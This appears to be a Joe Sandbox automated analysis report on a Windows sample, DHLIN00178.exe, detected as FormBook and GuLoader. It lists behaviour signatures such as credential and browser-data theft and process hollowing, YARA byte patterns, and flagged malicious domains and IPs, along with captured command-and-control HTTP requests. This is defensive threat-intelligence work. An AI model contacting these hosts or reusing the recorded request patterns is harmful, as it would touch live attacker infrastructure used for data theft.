Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHLIN00178.exe

Overview

General Information

Sample Name:DHLIN00178.exe
Analysis ID:829130
MD5:66fdf2df4fc8601124df76c284f797e1
SHA1:88031f2f9bfbf3eb0b069c68fd4ed4ee288daf9f
SHA256:e07a149d14fc37367e7331342d07dc45aec9ef7bbce780ea636c5d04f6c26f3f
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • DHLIN00178.exe (PID: 3876 cmdline: C:\Users\user\Desktop\DHLIN00178.exe MD5: 66FDF2DF4FC8601124DF76C284F797E1)
    • DHLIN00178.exe (PID: 1776 cmdline: C:\Users\user\Desktop\DHLIN00178.exe MD5: 66FDF2DF4FC8601124DF76C284F797E1)
      • explorer.exe (PID: 4760 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • cscript.exe (PID: 1912 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
          • firefox.exe (PID: 5256 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
            • WerFault.exe (PID: 2884 cmdline: C:\Windows\system32\WerFault.exe -u -p 5256 -s 284 MD5: 5C06542FED8EE68994D43938E7326D75)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 11 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: DHLIN00178.exeVirustotal: Detection: 12%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Antivirus detection for URL or domain
        Source: http://www.sem-jobs.com/i9th/Avira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/i9th/Avira URL Cloud: Label: malware
        Source: http://www.37123.vip/i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByYAvira URL Cloud: Label: malware
        Source: http://www.popcors.com/i9th/Avira URL Cloud: Label: malware
        Source: http://www.hhkk143.cfd/i9th/Avira URL Cloud: Label: malware
        Source: http://www.popcors.com/i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA==Avira URL Cloud: Label: malware
        Source: http://www.casinoenligne-france.info/i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw==Avira URL Cloud: Label: malware
        Source: http://www.hot6s.com/i9th/Avira URL Cloud: Label: malware
        Source: http://www.sandyhillsagritourism.com/i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw==Avira URL Cloud: Label: malware
        Source: http://www.spotcheck.site/i9th/Avira URL Cloud: Label: malware
        Source: http://www.adasoft.info/i9th/Avira URL Cloud: Label: malware
        Source: http://www.37123.vip/i9th/Avira URL Cloud: Label: malware
        Source: http://www.hhkk143.cfd/i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByYAvira URL Cloud: Label: malware
        Source: http://www.adasoft.info/i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ==Avira URL Cloud: Label: malware
        Source: http://www.dinggubd.net/i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw==Avira URL Cloud: Label: malware
        Source: http://www.dinggubd.net/i9th/Avira URL Cloud: Label: malware
        Source: http://www.sem-jobs.com/i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByYAvira URL Cloud: Label: malware
        Source: http://www.casinoenligne-france.info/i9th/Avira URL Cloud: Label: malware
        Source: http://www.spotcheck.site/i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByYAvira URL Cloud: Label: malware
        Source: http://www.cmproutdoors.com/i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByYAvira URL Cloud: Label: malware
        Source: 7.2.explorer.exe.14163814.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 9.2.firefox.exe.1e1f3814.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 8.2.cscript.exe.4f33814.3.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: DHLIN00178.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: DHLIN00178.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: cscript.pdbUGP source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
        Source: Binary string: mshtml.pdbUGP source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cscript.pdb source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00402765 FindFirstFileA,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00613200 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.8.203 80
        Source: C:\Windows\explorer.exeNetwork Connect: 156.255.170.114 80
        Source: C:\Windows\explorer.exeNetwork Connect: 222.122.213.231 80
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exeNetwork Connect: 64.190.63.111 80
        Source: C:\Windows\explorer.exeNetwork Connect: 3.9.182.46 80
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.193 80
        Source: C:\Windows\explorer.exeNetwork Connect: 38.163.2.19 80
        Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.54 80
        Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80
        Source: C:\Windows\explorer.exeNetwork Connect: 154.210.212.94 80
        Source: C:\Windows\explorer.exeNetwork Connect: 103.20.61.209 80
        Source: C:\Windows\explorer.exeNetwork Connect: 85.13.156.177 80
        Source: C:\Windows\explorer.exeNetwork Connect: 164.88.122.250 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.88.48.71 80
        Source: C:\Windows\explorer.exeNetwork Connect: 173.230.227.171 80
        Yara detected Generic Downloader
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll, type: DROPPED
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=k6CZcF1ZzBrKa1yLo5gUvle0ANnyvLBM7QyaLf2rdBQJTudoAeDS0wYpaDY8EKJddZnFAls+GzNjbQwIPoLL7cj/l4B8r0J0qw== HTTP/1.1Host: www.casinoenligne-france.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=QFexSP2v0Nfahq1S1liqATm5JxjoDmOPLniWa5ukQb1HIcv0ZKrmbVZaJMRsWG1ma9D40wKdkkU/v7zCXk+Vmaqrz8TPF5AIjg==&WsTjx=NuByY HTTP/1.1Host: www.37123.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=7TOFWM92qV6pcrPqADbwGQbE1m3eI0WOEQ27vaT62sOH8JmND2m/uvMqxI1JrYebWMYnTtk64dqQKbYLv2YomR00aJ+FLC/PKQ== HTTP/1.1Host: www.adasoft.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=a+ho0UoyjOnZk1lCGpcoaGjEnGbmKf9IFFNpvRdd6kC+DJQ8bYOFaRfvJPIieJPEPcY1cGGv0mjDAZsn1ciiV+plF0lWDSd4aQ==&WsTjx=NuByY HTTP/1.1Host: www.hhkk143.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=2Tzmt/R719tLBul7mSD638d/x74EcSC92+f/k2zWdQLWTlIxfL/M90/j5x2SA2nsSzi8rNl8g04ZV+bWcvwPkAs6VEt+1VDvVA== HTTP/1.1Host: www.popcors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=zQVcsXcgs6FIBsavZKdNfD9L9IyDn+uX2155hsx4ti6GChTIuvpprxYWozt816wf2SlZqQ0WfllzqwVqRSAw6movAhpuxOp8gg==&WsTjx=NuByY HTTP/1.1Host: www.spotcheck.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=skpIeuUmXVtlsTBo2HC5tT/aGHmA0xfCvZmPrRJBNh0Q4R2Cj+Wk81Dgip66N6Ewmv0qryLoIL5Vk4bBbPirrB4g3sIArb9fSw== HTTP/1.1Host: www.dinggubd.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=e0G7KvvSnXpGXx+R6TzWFmwlzMjwM1CfwQYDrhzCOtfsddq8ukik0UKA2v6ej/ZrW3TOdSCJ2lVMgjL9UMLlhRMn0e8ae0vL4Q==&WsTjx=NuByY HTTP/1.1Host: www.hot6s.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=uGolGY6UqX3sY/9PLVWwN9J/BTzz+6hffrhecVGN5FjI635Z0j5At+r+BPTklOB2HfIE21jETmQJryl68L/U0+pl2AIDG80kBg== HTTP/1.1Host: www.0w3jy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=lqJURYfuPjuznURrThj0aNiAAsaH1/tf+kf9L6kKBxqjEkH5T6yZpcUSZY6yP89JvXg35e6PTbHFvlwlO73OfbEtyEO8MEspLQ==&WsTjx=NuByY HTTP/1.1Host: www.cmproutdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=f7i/reR9z/XYtiufs4T2oCglTJHppPIhAuHFUSLntHIlLxYI6+YKRHThES4heztnev1TOQxmA1eDErfm329tx1/Ku+4bHpf60w== HTTP/1.1Host: www.daon3999.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=oRug1p2N3M7f21OO0lOBGqE4PfaV2grEv9VY5puRv4+mIhzAnHI5ZAphwtkKSkIVc0m4kQAL+gvPk8R76uitxElzOZBQuGepJQ==&WsTjx=NuByY HTTP/1.1Host: www.5319ss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=djsn1an+GmzwXFTB/MFsKGQXJOZQhusBpj6p6RqECbOdtpCOv2Kvcnth4kqs1edHWjVNJqZCDFfEwc47KO0/1j4B7gbgnVo+SQ== HTTP/1.1Host: www.riverflow.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=k3d2rpkNYMKNWaTFA3t0FG4YoWbTiA9z8X9PQFaufAL9B597B9+6rAPLCs31mdZA/v+HUWU5or1J0geLcv9LMooOfPEJdI/q3g==&WsTjx=NuByY HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?WsTjx=NuByY&eg9JVw4y=PDhFruS31XQUb4y36+furUas2tGpUbYkRl+Vt3Aa+IAT3kg40wU83JEX1Y8JNHLK9JPMefgRvvrtwUOOtwZiCVeSdeNGXRAYpw== HTTP/1.1Host: www.sandyhillsagritourism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /i9th/?eg9JVw4y=z7FIOMl2i6pYQmyH2ErzvRvTq7+wkT+xjTHk/876j4Q/5vAls38NbxDvDu1KKOzJ/k110/24aT2WAbPRlApsmRrAhaQg7G9jLg==&WsTjx=NuByY HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 156.255.170.114 156.255.170.114
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:36 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Mar 2023 20:39:39 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
